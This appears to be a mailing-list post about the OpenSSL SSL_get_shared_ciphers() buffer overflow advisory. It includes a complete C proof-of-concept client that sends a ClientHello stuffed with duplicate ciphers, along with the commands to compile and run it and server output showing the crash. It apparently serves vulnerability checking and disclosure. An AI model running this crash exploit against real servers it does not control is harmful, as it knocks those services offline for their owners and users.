Hello,
> FYI _Vin
> • Vulnerability VU#547300 - OpenSSL SSL_get_shared_ciphers ()
> vulnerable to buffer overflow, which may allow an attacker to execute
> code on an affected system (details posted at
> http://www.kb.cert.org/vuls/id/547300)
To check this you may for example execute:
1) On client side:
$ gcc -o ssl4 ssl4.c -lssl (compile)
$ ./ssl4 10.100.2.9:4433 1200 (connect to server)
2) On server side (here openssl binary)
$ openssl version
OpenSSL 0.9.7f 22 Mar 2005
$ openssl s_server -key key.pem -cert crt.pem
Using default temp DH parameters
ACCEPT <-- waiting for connection
bad gethostbyaddr <-- client connects
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMBBAIABQQgzF6/w+7Zo1Tm/5Bew3NzJK1ovCB0iRqyyMTIewlybnsE
MPmJB7B6HneYs47x2QHHT/Cd5Ukx2gdGAQcpo/BsbS5sgvmiYniETLDyk2wmYv+Y
XaEGAgRFbY8dogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:RC4-SHA:RC4-SHA:......
CIPHER is RC4-SHA
Segmentation fault <-- core dump
$
openssl binary use SSL_get_shared_ciphers() and after
getting SSL client_hello with too many ciphers
all binary core dumps.
(Checked on FC4, HPUX1100, HPUX1123)
Best regards,
--
Marek Marcola <[EMAIL PROTECTED]>
#include <stdio.h>
#include <openssl/ssl.h>
/**
* TLS connection info callback.
*
* @param ssl TLS connection socket
* @param type connection type
* @param val connection info
* @return none
*/
static void tls_connection_info_cb(const SSL * ssl, int type, int val)
{
if (type & SSL_CB_LOOP) {
printf("tls_state: %s: %s\n",
type & SSL_ST_CONNECT ? "connect" :
type & SSL_ST_ACCEPT ? "accept" : "undefined", SSL_state_string_long(ssl));
}
if (type & SSL_CB_ALERT) {
printf("tls_alert: %s:%s: %s\n",
type & SSL_CB_READ ? "read" : "write",
SSL_alert_type_string_long(val), SSL_alert_desc_string_long(val));
}
}
int main(int argc, char *argv[])
{
BIO *bio;
SSL *ssl;
SSL_CTX *ctx = NULL;
SSL_CIPHER *c;
STACK_OF(SSL_CIPHER) *sk;
int i;
char *ciph = "RC4-SHA";
if( argc != 3 ){
printf("Usage: ssl4 ip:port n_ciphers\n");
return(0);
}
SSL_load_error_strings();
SSLeay_add_ssl_algorithms();
RAND_load_file("/dev/urandom", 1024);
printf("crypto lib: %s\n", SSLeay_version(SSLEAY_VERSION));
if ((ctx = SSL_CTX_new(SSLv23_client_method())) == NULL) {
goto err;
}
SSL_CTX_set_verify_depth(ctx, 4);
if (SSL_CTX_set_cipher_list(ctx, ciph) != 1) {
goto err;
}
sk=ctx->cipher_list;
c=sk_SSL_CIPHER_value(sk,0);
printf("Adding %d pseudo ciphers\n", atoi(argv[2]));
for(i=0; i<atoi(argv[2]); i++){
sk_SSL_CIPHER_push(sk,c);
}
SSL_CTX_set_info_callback(ctx, tls_connection_info_cb);
printf("Connecting to: %s\n", argv[1]);
if ((bio = BIO_new_connect(argv[1])) == NULL) {
goto err;
}
if (BIO_do_connect(bio) <= 0) {
goto err;
}
if ((ssl = SSL_new(ctx)) == NULL) {
goto err;
}
SSL_set_bio(ssl, bio, bio);
if (SSL_connect(ssl) <= 0) {
goto err;
}
printf(" the cipher used by the client : %s\n", SSL_get_cipher(ssl));
if (SSL_write(ssl, "test 123\n", 9) <= 0) {
goto err;
}
SSL_shutdown(ssl);
return (0);
err:
if (ctx != NULL) {
SSL_CTX_free(ctx);
}
ERR_print_errors_fp(stderr);
return (1);
}
